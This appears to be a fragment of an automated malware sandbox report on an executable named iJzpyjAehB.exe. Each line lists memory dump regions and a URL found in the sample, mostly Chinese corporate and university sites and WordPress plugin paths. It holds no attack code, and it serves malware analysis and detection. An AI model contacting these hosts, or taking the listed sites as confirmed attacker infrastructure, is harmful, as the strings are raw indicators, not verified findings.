                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?today
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?yes
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/gallery.htm
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright%20fortune.html
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.basmedcol.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.484497313.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.398318769.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.bergeroy.com/locaux_arthabaska.asp
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.bucea.edu.cn/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/c
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ccri.com.cn/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/k
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chd.com.cn/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/index.shtml
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/xhtml/images/logo.png
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/.dll
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/U
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/9
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.css?
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.kreat
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.trans
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.utils
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.3
